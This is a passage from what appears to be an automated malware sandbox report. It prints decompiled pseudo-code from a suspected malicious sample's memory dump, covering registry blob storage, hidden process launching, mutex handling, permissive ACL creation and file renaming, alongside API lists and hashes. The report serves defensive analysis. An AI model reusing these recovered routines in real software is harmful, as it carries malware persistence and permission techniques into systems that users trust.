				void* _t88;
				char* _t89;
				intOrPtr _t90;
				void* _t103;
				void* _t104;
				char* _t106;
				intOrPtr _t107;
				char _t108;

				_t48 = __ecx;
				_t89 = __edx;
				_v24 = __ecx;
				if(_a4 == 0 || _a8 == 0) {
					L13:
					_t49 = _t48 | 0xffffffff;
					__eflags = _t49;
					return _t49;
				} else {
					_t115 = __edx;
					if(__edx == 0) {
						goto L13;
					}
					_t107 =  *((intOrPtr*)(__ecx + 0x108));
					_push(_t107);
					_t103 = 4;
					_v12 = __edx;
					_v28 = E000CD400( &_v12, _t103);
					_t93 = _t107 + __edx;
					E000D2301(_t107 + __edx,  &_v2832);
					_t54 = E000D242D(_t93, _t115, __fp0,  &_v2832, 0, 0x64);
					_t108 = _a8;
					_v12 = _t54;
					_v20 = _t54 + 6 + _t108;
					_t106 = E000C8604(_t54 + 6 + _t108);
					_v32 = _t106;
					if(_t106 != 0) {
						 *_t106 = _a12;
						_t16 =  &(_t106[6]); // 0x6
						_t106[1] = 1;
						_t106[2] = _t108;
						E000C86E1(_t16, _a4, _t108);
						_t21 = _t108 + 6; // 0x6
						E000D22D3( &_v2832, _t21 + _t106, _v12);
						_v16 = _t89;
						_t90 = _v24;
						_v12 =  *((intOrPtr*)(_t90 + 0x108));
						_push( &_v52);
						_t104 = 8;
						E000CF490( &_v16, _t104);
						E000CEAC1( &_v16,  &_v52, 0x14,  &_v328);
						E000CEB2E(_t106, _v20,  &_v328);
						_t73 = E000C9B0E(_t90);
						_v12 = _t73;
						__eflags = _t73;
						if(_t73 != 0) {
							E000C97A0(_v28,  &_v64, 0x10);
							_t80 = RegOpenKeyExA( *(_t90 + 0x10c), _v12, 0, 2,  &_a4);
							__eflags = _t80;
							if(_t80 == 0) {
								_t83 = RegSetValueExA(_a4,  &_v64, 0, 3, _t106, _v20);
								__eflags = _t83;
								if(_t83 != 0) {
									_push(0xfffffffc);
									_pop(0);
								}
								RegCloseKey(_a4);
							} else {
								_push(0xfffffffd);
								_pop(0);
							}
							E000C861A( &_v12, 0xffffffff);
						}
						E000C861A( &_v32, 0);
						return 0;
					}
					_t88 = 0xfffffffe;
					return _t88;
				}
			}

0x000ca0b8
0x000ca0bd
0x000ca0bf
0x000ca0c2
0x000ca231
0x000ca231
0x000ca231
0x00000000
0x000ca0d2
0x000ca0d2
0x000ca0d4
0x00000000
0x00000000
0x000ca0da
0x000ca0e3
0x000ca0e6
0x000ca0e7
0x000ca0ef
0x000ca0f2
0x000ca0fd
0x000ca10d
0x000ca112
0x000ca115
0x000ca11e
0x000ca126
0x000ca12b
0x000ca130
0x000ca13d
0x000ca13f
0x000ca146
0x000ca14b
0x000ca14e
0x000ca156
0x000ca163
0x000ca168
0x000ca16e
0x000ca177
0x000ca17d
0x000ca180
0x000ca181
0x000ca193
0x000ca1a3
0x000ca1af
0x000ca1b4
0x000ca1b7
0x000ca1b9
0x000ca1c3
0x000ca1de
0x000ca1e1
0x000ca1e3
0x000ca1fe
0x000ca201
0x000ca203
0x000ca205
0x000ca207
0x000ca207
0x000ca210
0x000ca1e5
0x000ca1e5
0x000ca1e7
0x000ca1e7
0x000ca219
0x000ca21f
0x000ca226
0x00000000
0x000ca22d
0x000ca134
0x00000000
0x000ca134

APIs

Part of subcall function 000D242D: _ftol2_sse.MSVCRT ref: 000D248E

Part of subcall function 000C8604: RtlAllocateHeap.NTDLL(00000008,?,?,000C8F84,00000100,?,000C5FCB), ref: 000C8612

RegOpenKeyExA.KERNEL32(?,00000000,00000000,00000002,00000000), ref: 000CA1DE

Memory Dump Source

Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeapOpen_ftol2_sse
String ID:
API String ID: 3756893521-0
Opcode ID: 16be1238e50dcd6ccbf2a17972ac82d6104939afd61b824ff034df4e1ce5065a
Instruction ID: 9aabb578f3ec898990dbc52fcad180c0f02837a836db019fe8de1ec4e559170f
Opcode Fuzzy Hash: 16be1238e50dcd6ccbf2a17972ac82d6104939afd61b824ff034df4e1ce5065a
Instruction Fuzzy Hash: B451B072A0021DBBCF10DF98DC85FDEBBB8AF05324F10826AF514AB191DB75A644CB61

Uniqueness

Uniqueness Score: -1.00%

Function 000CA911, Relevance: 4.6, APIs: 3, Instructions: 74
processCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E000CA911(WCHAR* _a4, DWORD* _a8, intOrPtr _a12, signed int _a16) {
				struct _PROCESS_INFORMATION _v20;
				struct _STARTUPINFOW _v92;
				signed int _t24;
				intOrPtr _t30;
				intOrPtr _t32;
				intOrPtr _t34;
				int _t42;
				WCHAR* _t44;

				_t42 = 0x44;
				memset( &_v92, 0, _t42);
				_v92.cb = _t42;
				asm("stosd");
				_t44 = 1;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t24 = _a16;
				if(_t24 != 0) {
					_v92.dwFlags = 1;
					_v92.wShowWindow = 0;
				}
				asm("sbb eax, eax");
				if(CreateProcessW(0, _a4, 0, 0, 0,  ~_t24 & 0x08000000, 0, 0,  &_v92,  &_v20) == 0) {
					_t44 = 0;
				} else {
					if(_a8 != 0) {
						_push(_a12);
						_t34 =  *0xde684; // 0x27bf8f0
						_push(_v20.hProcess);
						if( *((intOrPtr*)(_t34 + 0x2c))() >= 0) {
							GetExitCodeProcess(_v20.hProcess, _a8);
						}
					}
					_t30 =  *0xde684; // 0x27bf8f0
					 *((intOrPtr*)(_t30 + 0x30))(_v20.hThread);
					_t32 =  *0xde684; // 0x27bf8f0
					 *((intOrPtr*)(_t32 + 0x30))(_v20);
				}
				return _t44;
			}

0x000ca91c
0x000ca925
0x000ca92c
0x000ca934
0x000ca938
0x000ca939
0x000ca93a
0x000ca93b
0x000ca93c
0x000ca941
0x000ca945
0x000ca948
0x000ca948
0x000ca955
0x000ca971
0x000ca9ae
0x000ca973
0x000ca976
0x000ca978
0x000ca97b
0x000ca980
0x000ca988
0x000ca990
0x000ca990
0x000ca988
0x000ca996
0x000ca99e
0x000ca9a1
0x000ca9a9
0x000ca9a9
0x000ca9b6

APIs

memset.MSVCRT ref: 000CA925
CreateProcessW.KERNEL32(00000000,00001388,00000000,00000000,00000000,000CC1AB,00000000,00000000,?,00000000,00000000,00000000,00000001), ref: 000CA96C
GetExitCodeProcess.KERNEL32(00000000,?), ref: 000CA990

Memory Dump Source

Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Yara matches

Similarity

API ID: Process$CodeCreateExitmemset
String ID:
API String ID: 4170947310-0
Opcode ID: 515fd2f31e6901e20d6c51561e52fb1df9f2721549949078c0095c01d271d124
Instruction ID: ad8e7d9e7c99006ac07fdead5766fa5e04d5cfaaf349d8d5b7d3a67e274f57a9
Opcode Fuzzy Hash: 515fd2f31e6901e20d6c51561e52fb1df9f2721549949078c0095c01d271d124
Instruction Fuzzy Hash: 4F210E71A10119BFEB519FA9DC85EAE7BBCEB18784B01441AFA15D6161D634DC008B61

Uniqueness

Uniqueness Score: -1.00%

Function 000CB998, Relevance: 4.6, APIs: 3, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E000CB998(union _TOKEN_INFORMATION_CLASS __edx, DWORD* _a4) {
				long _v8;
				void* _v12;
				void* _t12;
				void* _t20;
				void* _t22;
				union _TOKEN_INFORMATION_CLASS _t28;
				void* _t31;

				_push(_t22);
				_push(_t22);
				_t31 = 0;
				_t28 = __edx;
				_t20 = _t22;
				if(GetTokenInformation(_t20, __edx, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
					L6:
					_t12 = _t31;
				} else {
					_t31 = E000C8604(_v8);
					_v12 = _t31;
					if(_t31 != 0) {
						if(GetTokenInformation(_t20, _t28, _t31, _v8, _a4) != 0) {
							goto L6;
						} else {
							E000C861A( &_v12, _t16);
							goto L3;
						}
					} else {
						L3:
						_t12 = 0;
					}
				}
				return _t12;
			}

0x000cb99b
0x000cb99c
0x000cb9a3
0x000cb9ab
0x000cb9af
0x000cb9b8
0x000cb9fe
0x000cb9fe
0x000cb9c5
0x000cb9cd
0x000cb9cf
0x000cb9d5
0x000cb9ee
0x00000000
0x000cb9f0
0x000cb9f5
0x00000000
0x000cb9fb
0x000cb9d7
0x000cb9d7
0x000cb9d7
0x000cb9d7
0x000cb9d5
0x000cba04

APIs

GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,74EC17D9,00000000,10000000,00000000,00000000,?,000CBA37,?,00000000,?,000CD0A8), ref: 000CB9B3
GetLastError.KERNEL32(?,000CBA37,?,00000000,?,000CD0A8), ref: 000CB9BA

Part of subcall function 000C8604: RtlAllocateHeap.NTDLL(00000008,?,?,000C8F84,00000100,?,000C5FCB), ref: 000C8612

GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,?,000CBA37,?,00000000,?,000CD0A8), ref: 000CB9E9

Memory Dump Source

Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Yara matches

Similarity

API ID: InformationToken$AllocateErrorHeapLast
String ID:
API String ID: 2499131667-0
Opcode ID: e9155d94487f8a68c3b89b0e28b4ce959b8024583ace24d3e3980001a81adf0b
Instruction ID: d997e41f721a916132a1fdbd49b54382bda47c6799cd78954eaa02ec7e04328f
Opcode Fuzzy Hash: e9155d94487f8a68c3b89b0e28b4ce959b8024583ace24d3e3980001a81adf0b
Instruction Fuzzy Hash: A501A272601118BF9B209BA6DC4AEAF7FECDB457A1B10022AFA05D7111EB30DD0087B0

Uniqueness

Uniqueness Score: -1.00%

Function 000C590C, Relevance: 4.5, APIs: 3, Instructions: 44
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E000C590C(CHAR* __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr _t10;
				void* _t13;
				void* _t19;
				signed int _t21;
				signed int _t22;

				_t13 = __edx;
				if(__ecx != 0) {
					_t22 = 0;
					_t19 = CreateMutexA(0, 1, __ecx);
					if(_t19 != 0) {
						if(GetLastError() != 0xb7 || E000CA4BF(_t19, _t13) != 0xffffffff) {
							_t22 = 1;
							 *_a4 = _t19;
						} else {
							_t10 =  *0xde684; // 0x27bf8f0
							 *((intOrPtr*)(_t10 + 0x30))(_t19);
						}
					} else {
						GetLastError();
						_t22 = 0xffffffff;
					}
				} else {
					_t22 = _t21 | 0xffffffff;
				}
				return _t22;
			}

0x000c5910
0x000c5915
0x000c5921
0x000c592e
0x000c5932
0x000c594a
0x000c596a
0x000c596b
0x000c595a
0x000c595a
0x000c5960
0x000c5960
0x000c5934
0x000c5934
0x000c593a
0x000c593a
0x000c5917
0x000c5917
0x000c5917
0x000c5973

APIs

CreateMutexA.KERNELBASE(00000000,00000001,00000000,00000000,00000000,?,?,000C59CD,000C5DD4,Global,000DBA18,?,00000000,?,00000002), ref: 000C5928
GetLastError.KERNEL32(?,?,000C59CD,000C5DD4,Global,000DBA18,?,00000000,?,00000002), ref: 000C5934

Memory Dump Source

Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Yara matches

Similarity

API ID: CreateErrorLastMutex
String ID:
API String ID: 1925916568-0
Opcode ID: a8e76bdbdbd469d2b8c3e9a1a01432ac857b6536fe4a497d4adbc72172b7e5b0
Instruction ID: d073c145edc5ca2aa73541b9c57a8b093e21ae94b269b6476e6d31558b2c847e
Opcode Fuzzy Hash: a8e76bdbdbd469d2b8c3e9a1a01432ac857b6536fe4a497d4adbc72172b7e5b0
Instruction Fuzzy Hash: A1F02835601910CBD6A0175ADC84F3E7B98EB95772B51036AF969DB1E1CF34DC4443B1

Uniqueness

Uniqueness Score: -1.00%

Function 000CA471, Relevance: 4.5, APIs: 3, Instructions: 30
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E000CA471(CHAR* __ecx, void* __edx) {
				intOrPtr _t8;
				void* _t16;
				void* _t17;

				_t16 = __edx; // executed
				_t17 = CreateMutexA(0, 1, __ecx);
				if(_t17 != 0) {
					if(GetLastError() == 0xb7 && E000CA4BF(_t17, _t16) < 0) {
						_t8 =  *0xde684; // 0x27bf8f0
						 *((intOrPtr*)(_t8 + 0x30))(_t17);
						_t17 = 0;
					}
					return _t17;
				}
				GetLastError();
				return 0;
			}

0x000ca47d
0x000ca485
0x000ca489
0x000ca4a0
0x000ca4af
0x000ca4b5
0x000ca4b8
0x000ca4b8
0x00000000
0x000ca4ba
0x000ca48b
0x00000000

APIs

CreateMutexA.KERNELBASE(00000000,00000001,?,00000000,00000000,000C4E14,00000000), ref: 000CA47F
GetLastError.KERNEL32 ref: 000CA48B
GetLastError.KERNEL32 ref: 000CA495

Memory Dump Source

Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Yara matches

Similarity

API ID: ErrorLast$CreateMutex
String ID:
API String ID: 200418032-0
Opcode ID: 77e21d80ee078d91a8c29d57bde9561238bcfa181556416213a9dbb61c26a2d7
Instruction ID: aa0b7b2252ede9d51be57bd9111e8f042ae3321c19d90ec579b42b1c7a2d6374
Opcode Fuzzy Hash: 77e21d80ee078d91a8c29d57bde9561238bcfa181556416213a9dbb61c26a2d7
Instruction Fuzzy Hash: 49F0ED313014249BE6252729E88CF5F3B99DFE9754F02446AFA09CB251EAACCC0643F2

Uniqueness

Uniqueness Score: -1.00%

Function 000C6DA0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 106
fileCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E000C6DA0(void* __eflags, void* __fp0) {
				short _v536;
				WCHAR* _v544;
				WCHAR* _t9;
				intOrPtr _t10;
				intOrPtr _t11;
				void* _t22;
				void* _t32;
				intOrPtr _t34;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t43;
				intOrPtr _t46;
				intOrPtr _t49;
				void* _t51;
				void* _t53;
				void* _t56;
				WCHAR* _t59;
				signed int _t60;
				void* _t62;
				void* _t63;
				void* _t74;

				_t74 = __fp0;
				_t34 =  *0xde778; // 0x27bfc18
				_t62 = (_t60 & 0xfffffff8) - 0x21c;
				_t51 = 0x31;
				_t32 = 1; // executed
				_t9 = E000C9ED0(_t34, _t51); // executed
				if(_t9 != 0) {
					_t10 =  *0xde78c; // 0x0
					_t66 = _t10;
					if(_t10 == 0) {
						_t49 =  *0xde688; // 0xf0000
						_t10 = E000CEDCF(_t49 + 0xb0, _t51, _t66);
						 *0xde78c = _t10;
					}
					_push(0);
					_push(_t10);
					_t11 =  *0xde688; // 0xf0000
					_push(L"\\c");
					_t9 = E000C92E5(_t11 + 0x438);
					_t59 = _t9;
					_t63 = _t62 + 0x10;
					_v544 = _t59;
					if(_t59 != 0) {
						while(1) {
							_t35 =  *0xde688; // 0xf0000
							_t56 = E000CA471(_t35 + 0x1878, 0x1388);
							if(_t56 == 0) {
								break;
							}
							if(E000CB269(_t59) == 0) {
								_t32 = E000CF14F(_t59, 0x1388, _t74);
							}
							E000CA4DB(_t56);
							_t41 =  *0xde684; // 0x27bf8f0
							 *((intOrPtr*)(_t41 + 0x30))(_t56);
							if(_t32 > 0) {
								E000C980C( &_v544);
								_t43 =  *0xde778; // 0x27bfc18
								_t53 = 0x33;
								if(E000C9ED0(_t43, _t53) != 0) {
									L12:
									__eflags = E000C1C68(_t59, __eflags, _t74);
									if(__eflags >= 0) {
										E000CB1B1(_t59, _t53, __eflags, _t74);
										continue;
									}
								} else {
									_t46 =  *0xde778; // 0x27bfc18
									_t53 = 0x12;
									_t22 = E000C9ED0(_t46, _t53);
									_t72 = _t22;
									if(_t22 != 0 || E000CA4EF(_t53, _t72) != 0) {
										_push(E000C980C(0));
										E000C9640( &_v536, 0x104, L"%s.%u", _t59);
										_t63 = _t63 + 0x14;
										MoveFileW(_t59,  &_v536);
										continue;
									} else {
										goto L12;
									}
								}
							}
							break;
						}
						_t9 = E000C861A( &_v544, 0xfffffffe);
					}
				}
				return _t9;
			}

0x000c6da0
0x000c6da6
0x000c6dac
0x000c6db9
0x000c6dba
0x000c6dbb
0x000c6dc2
0x000c6dc8
0x000c6dcd
0x000c6dcf
0x000c6dd1
0x000c6ddd
0x000c6de2
0x000c6de2
0x000c6de7
0x000c6de9
0x000c6dea
0x000c6df4
0x000c6dfa
0x000c6dff
0x000c6e01
0x000c6e04
0x000c6e0a
0x000c6e10
0x000c6e10
0x000c6e26
0x000c6e2a
0x00000000
0x00000000
0x000c6e39
0x000c6e42
0x000c6e42
0x000c6e46
0x000c6e4b
0x000c6e52
0x000c6e57
0x000c6e5d
0x000c6e62
0x000c6e6a
0x000c6e72
0x000c6ec0
0x000c6ec7
0x000c6ec9
0x000c6ecd
0x00000000
0x000c6ecd
0x000c6e74
0x000c6e74
0x000c6e7c
0x000c6e7d
0x000c6e82
0x000c6e84
0x000c6e96
0x000c6ea7
0x000c6eac
0x000c6eb5
0x00000000
0x00000000
0x00000000
0x00000000
0x000c6e84
0x000c6e72
0x00000000
0x000c6e57
0x000c6ede
0x000c6ee4
0x000c6e0a
0x000c6eeb

APIs

MoveFileW.KERNEL32 ref: 000C6EB5

Strings

%s.%u, xrefs: 000C6E98

Memory Dump Source

Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Yara matches

Similarity

API ID: FileMove
String ID: %s.%u
API String ID: 3562171763-1288070821
Opcode ID: abb1974d68a3cf11a90f5f4fc4a910d84dcf3eeb1d4c396366a110d1392bc96d
Instruction ID: 16c242f961a16b44c7ea8ae58b162dabe7e8efe05d509a60da4a7651e3b0c8da
Opcode Fuzzy Hash: abb1974d68a3cf11a90f5f4fc4a910d84dcf3eeb1d4c396366a110d1392bc96d
Instruction Fuzzy Hash: 07318B753053509AE664FB65DC8AFAE339ADB90754F14002EFA058B2C3EF2AD905C762

Uniqueness

Uniqueness Score: -1.00%

Function 000C2AEA, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 71
stringCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E000C2AEA() {
				intOrPtr _v8;
				signed int _v12;
				CHAR* _v16;
				signed int _t16;
				intOrPtr _t21;
				intOrPtr _t22;
				void* _t26;
				void* _t29;
				signed int _t31;
				intOrPtr _t36;
				CHAR* _t38;
				intOrPtr _t39;
				void* _t40;

				_t15 =  *0xde710 * 0x64;
				_t39 = 0;
				_v12 =  *0xde710 * 0x64;
				_t16 = E000C8604(_t15);
				_t38 = _t16;
				_v16 = _t38;
				if(_t38 != 0) {
					_t31 =  *0xde710; // 0x2
					_t36 = 0;
					_v8 = 0;
					if(_t31 == 0) {
						L9:
						_push(_t38);
						E000C9F48(0xe); // executed
						E000C861A( &_v16, _t39);
						return 0;
					}
					_t29 = 0;
					do {
						_t21 =  *0xde714; // 0x27bfe88
						if( *((intOrPtr*)(_t29 + _t21)) != 0) {
							if(_t39 != 0) {
								lstrcatA(_t38, "|");
								_t39 = _t39 + 1;
							}
							_t22 =  *0xde714; // 0x27bfe88
							_push( *((intOrPtr*)(_t29 + _t22 + 0x10)));
							_push( *((intOrPtr*)(_t29 + _t22 + 8)));
							_t26 = E000C9601( &(_t38[_t39]), _v12 - _t39, "%u;%u;%u",  *((intOrPtr*)(_t29 + _t22)));
							_t31 =  *0xde710; // 0x2
							_t40 = _t40 + 0x18;
							_t36 = _v8;
							_t39 = _t39 + _t26;
						}
						_t36 = _t36 + 1;
						_t29 = _t29 + 0x20;
						_v8 = _t36;
					} while (_t36 < _t31);
					goto L9;
				}
				return _t16 | 0xffffffff;
			}

0x000c2af0
0x000c2afa
0x000c2afd
0x000c2b00
0x000c2b05
0x000c2b07
0x000c2b0d
0x000c2b17
0x000c2b1d
0x000c2b1f
0x000c2b24
0x000c2b81
0x000c2b87
0x000c2b8b
0x000c2b96
0x00000000
0x000c2b9d
0x000c2b26
0x000c2b28
0x000c2b28
0x000c2b31
0x000c2b35
0x000c2b3d
0x000c2b43
0x000c2b43
0x000c2b44
0x000c2b49
0x000c2b4d
0x000c2b63
0x000c2b68
0x000c2b6e
0x000c2b71
0x000c2b74
0x000c2b74
0x000c2b76
0x000c2b77
0x000c2b7a
0x000c2b7d
0x00000000
0x000c2b28
0x00000000

APIs

Part of subcall function 000C8604: RtlAllocateHeap.NTDLL(00000008,?,?,000C8F84,00000100,?,000C5FCB), ref: 000C8612

lstrcatA.KERNEL32(00000000,000DB9A0,000C573E,-00000020,00000000,?,00000000,?,?,?,?,?,?,?,000C573E), ref: 000C2B3D

Strings

%u;%u;%u, xrefs: 000C2B59

Memory Dump Source

Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeaplstrcat
String ID: %u;%u;%u
API String ID: 3011335133-2973439046
Opcode ID: 2094acf824114d6b149425799c8295bbb7a354877be0ea23f216adc157b61f9a
Instruction ID: c18da029e8387f57c48651e8e1138d8feb965970a6bd18960df813de622e7610
Opcode Fuzzy Hash: 2094acf824114d6b149425799c8295bbb7a354877be0ea23f216adc157b61f9a
Instruction Fuzzy Hash: A4110632A01304ABDB14EFA9DCC5E9E7BB9EB84324B10446EE900DB191CB349D00CB64

Uniqueness

Uniqueness Score: -1.00%

Function 000CBD10, Relevance: 3.1, APIs: 2, Instructions: 149
memoryCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E000CBD10() {
				char _v8;
				void* _v12;
				char _v16;
				short _v20;
				char _v24;
				short _v28;
				char _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v88;
				intOrPtr _v92;
				void _v96;
				intOrPtr _t58;
				intOrPtr _t61;
				intOrPtr _t63;
				intOrPtr _t65;
				intOrPtr _t67;
				intOrPtr _t70;
				intOrPtr _t73;
				intOrPtr _t77;
				intOrPtr _t79;
				intOrPtr _t81;
				intOrPtr _t85;
				intOrPtr _t87;
				signed int _t90;
				void* _t92;
				intOrPtr _t93;
				void* _t98;

				_t90 = 8;
				_v28 = 0xf00;
				_v32 = 0;
				_v24 = 0;
				memset( &_v96, 0, _t90 << 2);
				_v20 = 0x100;
				_push( &_v12);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_v16 = 0;
				_push(0);
				_v8 = 0;
				_push(1);
				_v12 = 0;
				_push( &_v24);
				_t58 =  *0xde68c; // 0x27bfab8
				_t98 = 0;
				if( *((intOrPtr*)(_t58 + 0xc))() == 0) {
					L14:
					if(_v8 != 0) {
						_t67 =  *0xde68c; // 0x27bfab8
						 *((intOrPtr*)(_t67 + 0x10))(_v8);
					}
					if(_v12 != 0) {
						_t65 =  *0xde68c; // 0x27bfab8
						 *((intOrPtr*)(_t65 + 0x10))(_v12);
					}
					if(_t98 != 0) {
						_t63 =  *0xde684; // 0x27bf8f0
						 *((intOrPtr*)(_t63 + 0x34))(_t98);
					}
					if(_v16 != 0) {
						_t61 =  *0xde684; // 0x27bf8f0
						 *((intOrPtr*)(_t61 + 0x34))(_v16);
					}
					L22:
					return _t98;
				}
				_v68 = _v12;
				_t70 =  *0xde688; // 0xf0000
				_t92 = 2;
				_v96 = 0x1fffff;
				_v92 = 0;
				_v88 = 3;
				_v76 = 0;
				_v72 = 5;
				if( *((intOrPtr*)(_t70 + 4)) != 6 ||  *((intOrPtr*)(_t70 + 8)) < 0) {
					if( *((intOrPtr*)(_t70 + 4)) < 0xa) {
						goto L7;
					}
					goto L4;
				} else {
					L4:
					_push( &_v8);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(1);
					_push(_t92);
					_push(_t92);
					_push( &_v32);
					_t85 =  *0xde68c; // 0x27bfab8
					if( *((intOrPtr*)(_t85 + 0xc))() == 0) {
						goto L14;
					} else {
						_t87 = _v8;
						if(_t87 != 0) {
							_push(2);
							_pop(1);
							_v64 = 0x1fffff;
							_v60 = 1;
							_v56 = 3;
							_v44 = 0;
							_v40 = 1;
							_v36 = _t87;
						}
						L7:
						_push( &_v16);
						_push(0);
						_push( &_v96);
						_t73 =  *0xde68c; // 0x27bfab8
						_push(1); // executed
						if( *((intOrPtr*)(_t73 + 8))() != 0) {
							goto L14;
						}
						_t98 = LocalAlloc(0x40, 0x14);
						if(_t98 == 0) {
							goto L14;
						}
						_t93 =  *0xde68c; // 0x27bfab8
						_push(1);
						_push(_t98);
						if( *((intOrPtr*)(_t93 + 0x90))() == 0) {
							goto L14;
						}
						_t77 =  *0xde68c; // 0x27bfab8
						_push(0);
						_push(_v16);
						_push(1);
						_push(_t98);
						if( *((intOrPtr*)(_t77 + 0x94))() == 0) {
							goto L14;
						}
						if(_v8 != 0) {
							_t81 =  *0xde68c; // 0x27bfab8
							 *((intOrPtr*)(_t81 + 0x10))(_v8);
						}
						_t79 =  *0xde68c; // 0x27bfab8
						 *((intOrPtr*)(_t79 + 0x10))(_v12);
						goto L22;
					}
				}
			}

0x000cbd1b
0x000cbd1e
0x000cbd26
0x000cbd2c
0x000cbd2f
0x000cbd34
0x000cbd3a
0x000cbd3b
0x000cbd3c
0x000cbd3d
0x000cbd3e
0x000cbd3f
0x000cbd40
0x000cbd41
0x000cbd44
0x000cbd47
0x000cbd49
0x000cbd4c
0x000cbd50
0x000cbd53
0x000cbd54
0x000cbd59
0x000cbd60
0x000cbe54
0x000cbe58
0x000cbe5a
0x000cbe62
0x000cbe62
0x000cbe69
0x000cbe6b
0x000cbe73
0x000cbe73
0x000cbe78
0x000cbe7a
0x000cbe80
0x000cbe80
0x000cbe87
0x000cbe89
0x000cbe91
0x000cbe91
0x000cbe95
0x000cbe9a
0x000cbe9a
0x000cbd6b
0x000cbd6e
0x000cbd75
0x000cbd76
0x000cbd7d
0x000cbd80
0x000cbd87
0x000cbd8a
0x000cbd95
0x000cbda0
0x00000000
0x00000000
0x00000000
0x000cbda2
0x000cbda2
0x000cbda5
0x000cbda6
0x000cbda7
0x000cbda8
0x000cbda9
0x000cbdaa
0x000cbdab
0x000cbdac
0x000cbdae
0x000cbdaf
0x000cbdb3
0x000cbdb4
0x000cbdbe
0x00000000
0x000cbdc4
0x000cbdc4
0x000cbdc9
0x000cbdcb
0x000cbdcd
0x000cbdce
0x000cbdd5
0x000cbdd8
0x000cbddf
0x000cbde2
0x000cbde5
0x000cbde5
0x000cbde8
0x000cbdeb
0x000cbdec
0x000cbdf0
0x000cbdf1
0x000cbdf6
0x000cbdfc
0x00000000
0x00000000
0x000cbe08
0x000cbe0c
0x00000000
0x00000000
0x000cbe0e
0x000cbe14
0x000cbe16
0x000cbe1f
0x00000000
0x00000000
0x000cbe21
0x000cbe26
0x000cbe27
0x000cbe2a
0x000cbe2c
0x000cbe35
0x00000000
0x00000000
0x000cbe3a
0x000cbe3c
0x000cbe44
0x000cbe44
0x000cbe47
0x000cbe4f
0x00000000
0x000cbe4f
0x000cbdbe

APIs

SetEntriesInAclA.ADVAPI32(00000001,001FFFFF,00000000,?), ref: 000CBDF7
LocalAlloc.KERNEL32(00000040,00000014), ref: 000CBE02

Memory Dump Source

Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Yara matches

Similarity

API ID: AllocEntriesLocal
String ID:
API String ID: 2146116654-0
Opcode ID: 1d99a57611baaec703b87adae8a6e6c7168fee3c9c6b929967c5ce84b8f1f07f
Instruction ID: fb9cf3d49498b04ba18fc6af388e3f93cc6b6c7a00e5ba42f1d92bd048f5cdbb
Opcode Fuzzy Hash: 1d99a57611baaec703b87adae8a6e6c7168fee3c9c6b929967c5ce84b8f1f07f
Instruction Fuzzy Hash: C5512B71901248EFDB20DF99D889FDDBBF8EF44700F15806AF605AB2A0D7748944CB60

Uniqueness

Uniqueness Score: -1.00%

Function 000C98EE, Relevance: 3.1, APIs: 2, Instructions: 133
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E000C98EE(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t45;
				intOrPtr _t46;
				intOrPtr _t48;
				intOrPtr _t49;
				void* _t52;
				intOrPtr _t53;
				intOrPtr _t54;
				struct _SECURITY_ATTRIBUTES* _t58;
				intOrPtr _t59;
				intOrPtr _t61;
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t67;
				intOrPtr _t69;
				struct _SECURITY_ATTRIBUTES* _t73;
				intOrPtr _t74;
				intOrPtr _t77;
				intOrPtr _t78;
				intOrPtr _t79;
				intOrPtr _t82;
				intOrPtr _t83;
				void* _t86;
				intOrPtr _t87;
				intOrPtr _t89;
				signed int _t92;
				intOrPtr _t97;
				intOrPtr _t98;
				int _t106;
				intOrPtr _t110;
				signed int _t112;
				signed int _t113;
				void* _t115;

				_push(__ecx);
				_push(__ecx);
				_v8 = __edx;
				_v12 = __ecx;
				_t77 =  *0xde76c; // 0x1cc
				_t73 = 0;
				if(E000CA4BF(_t77, 0x7530) >= 0) {
					_t45 =  *0xde770; // 0x2631ee8
					_t112 = 0;
					_t106 = 0;
					do {
						_t78 =  *((intOrPtr*)(_t106 + _t45));
						if(_t78 == 0) {
							L6:
							if( *((intOrPtr*)(_t106 + _t45)) == _t73) {
								_t113 = _t112 << 5;
								if(_v8 == _t73) {
									 *(_t113 + _t45 + 0x10) = _t73;
									_t46 =  *0xde770; // 0x2631ee8
									 *(_t113 + _t46 + 0xc) = _t73;
									L14:
									_t79 =  *0xde770; // 0x2631ee8
